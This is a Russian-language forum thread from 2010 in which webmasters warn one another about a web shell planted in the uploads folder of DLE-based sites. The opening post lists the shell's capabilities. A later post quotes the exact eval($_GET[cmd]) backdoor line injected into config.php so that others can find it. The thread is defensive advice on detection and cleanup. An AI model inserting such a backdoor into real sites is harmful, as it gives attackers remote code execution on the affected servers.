Проверяйте свои сайты DLE - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

4 страниц

1 2 3 4 >

Проверяйте свои сайты DLE, Проверяйте свои сайты DLE

Опции

ChristmasNet

Topic Starter

24.9.2010, 13:19; Ответить: ChristmasNet

Сообщение #1

Бывалый

Группа: User
Сообщений: 441
Регистрация: 13.1.2010
Из: Россия, ХМАО
Поблагодарили: 93 раза
Репутация:

Есть такая группа или хацкер Web Shell by oRb.
Недавно обнаружил у себя на сайте шелл, залитый в папку uploads/fotos. Решил обновиться до DLE 9.0, после установки проверил антивирусом и нашел эту гадость.

Вот что может этот шелл.

Описание:

Авторизация
Инфа о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Обход Safe mode
Работа со строками + поиск хеша в онлайн базах
Брутфорс (FTP, MySql, PostgreSQL)
Биндпорты и бек-коннекты на C и Perl
Самоудаление
Поиск текста в файлах
Под UNIX/WIN

Из фишек

Антигугл (чекается юзерагент, если гугл, тогда 404)
Консолька запоминает введенные комманды. (перемещатся по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (23.53 KB)
Удобен в инклюдах
Выбор кодировки, в которой работает шелл.

на сайте появляется админ с логином http://www.google.ru/search?q=wildlogin&am...art=10&sa=N

Смотрите свои сайты, обновляйте.

Поблагодарили: (8)

Barmaley, F4R, marsik, mlevox, n1tr1k, neo-skynet, Wolfak, xdvix

Ответить с цитированием данного сообщения

neo-skynet neo-skynet 24.9.2010, 13:23; Сообщений: 877 Поблагодарили: 126 раз Репутация: 19 Просмотр профиля	24.9.2010, 13:23; Ответить: neo-skynet Сообщение #2
Дядько Admin Группа: Active User Сообщений: 877 Регистрация: 5.1.2009 Из: Localhost Поблагодарили: 126 раз Репутация: 19	Сайты проверил, вроде все чисто Спасибо, возьмём на заметочку. -------------------- Коси бабло 8$ за 1000 кликов

alex_zp alex_zp 26.9.2010, 11:50; Сообщений: 41 Поблагодарили: 3 раза Репутация: 0 Просмотр профиля	26.9.2010, 11:50; Ответить: alex_zp Сообщение #3
Новичок Группа: User Сообщений: 41 Регистрация: 8.7.2010 Поблагодарили: 3 раза Репутация: 0	Спасибо за совет и за бдительность.

ChristmasNet Topic Starter ChristmasNetTopic Starter 29.9.2010, 7:21; Сообщений: 441 Поблагодарили: 93 раза Репутация: 16 Просмотр профиля	Topic Starter 29.9.2010, 7:21; Ответить: ChristmasNet Сообщение #4
Бывалый Группа: User Сообщений: 441 Регистрация: 13.1.2010 Из: Россия, ХМАО Поблагодарили: 93 раза Репутация: 16	смотрите еще файл dbconfig.php и config.php в папке /engine/data/ В файл dbconfig.php прописывается жаваскрипт с партнёркой. А в файл config.php дописывается код: 'lang_123' => "{${@eval($_GET[cmd])}}",

vkina vkina 29.9.2010, 7:42; Сообщений: 458 Поблагодарили: 58 раз Репутация: 11 Просмотр профиля	29.9.2010, 7:42; Ответить: vkina Сообщение #5
Бывалый Группа: Banned Сообщений: 458 Регистрация: 8.5.2009 Из: Украина Поблагодарили: 58 раз Репутация: 11	Спасибо. На порно сайте нашол такой файл, а на других сайтах каким-то образом взламывают и вешают свои кликандеры. Пароль вопще не помогает.

Илюха Илюха 29.9.2010, 10:13; Сообщений: 3894 Поблагодарили: 720 раз Репутация: 107 Просмотр профиля	29.9.2010, 10:13; Ответить: Илюха Сообщение #6
Топовый постер Группа: Active User Сообщений: 3894 Регистрация: 11.6.2009 Поблагодарили: 720 раз Репутация: 107	А как выглядит шел в папке uploads/fotos? в виде какого файла. Насколько я понимаю и права доступа 644 не помогают в этом случае?

Morbid Morbid 29.9.2010, 13:04; Сообщений: 8 Поблагодарили: 0 раз Репутация: 0 Просмотр профиля	29.9.2010, 13:04; Ответить: Morbid Сообщение #7
Новичок Группа: Viewer Сообщений: 8 Регистрация: 22.9.2010 Поблагодарили: 0 раз Репутация: 0	Спасибо, что предупредили

Илюха Илюха 30.9.2010, 7:09; Сообщений: 3894 Поблагодарили: 720 раз Репутация: 107 Просмотр профиля	30.9.2010, 7:09; Ответить: Илюха Сообщение #8
Топовый постер Группа: Active User Сообщений: 3894 Регистрация: 11.6.2009 Поблагодарили: 720 раз Репутация: 107	На одном из сайтах нашел такую хрень. Спасибо большое. Интересно только как это туда попадает? Сообщение отредактировал Илюха - 30.9.2010, 7:13

Snejebelka Snejebelka 30.9.2010, 7:35; Сообщений: 179 Поблагодарили: 69 раз Репутация: 25 Просмотр профиля	30.9.2010, 7:35; Ответить: Snejebelka Сообщение #9
Участник Группа: User Сообщений: 179 Регистрация: 2.4.2010 Из: Ростов-на-Дону Поблагодарили: 69 раз Репутация: 25	(Илюха @ 30.9.2010, 7:09) На одном из сайтах нашел такую хрень. Спасибо большое. Интересно только как это туда попадает? Очень просто попадает у вас дырки с недостаточной фильтрацией данных не закрыты. ТС правильно сделал выводы и не стал дыры убирать, а обновил версию. В последней версии эти уязвимости убраны. Убирайте уязвимости, шелл ищите и удаляйте, файлы его расположены в папке uploads, их может быть несколько. Пароли поменяйте и впредь такого безобразия не будет. -------------------- Жизнь прекрасна! Если правильно подобрать антидепрессанты... Надежный хостинг SSL сертификат в подарок Поблагодарили: (1) Илюха

Seo-optimist Seo-optimist 1.10.2010, 13:46; Сообщений: 2161 Поблагодарили: 639 раз Репутация: 165 Просмотр профиля	1.10.2010, 13:46; Ответить: Seo-optimist Сообщение #10
Старожил Группа: Active User Сообщений: 2161 Регистрация: 31.1.2009 Поблагодарили: 639 раз Репутация: 165	Хммм... нашел на одном сайте такое, не подскажите как избавится?

« Предыдущая тема · Программная часть · Следующая тема »

4 страниц

1 2 3 4 >

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Сайты уходят в прошлое для развития бизнеса стали не столь актуальны	154	muratastana	30501	16.4.2024, 22:40 автор: malamut
Продам свои сайты 10 сайтов на продажу	3	ArchiDOM	1447	5.4.2024, 3:51 автор: Llirik
Есть смысл создавать сайты на латышском?	16	Nekit	3927	31.3.2024, 1:23 автор: Liudmila
Сайты с доходом на продажу. Будет ли спрос?	46	Telnor	45037	30.3.2024, 15:37 автор: trustedadvisor
Куплю хорошие сайты	7	Boymaster	2431	25.3.2024, 12:50 автор: Wilkinson

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 19.4.2024, 16:07

Дизайн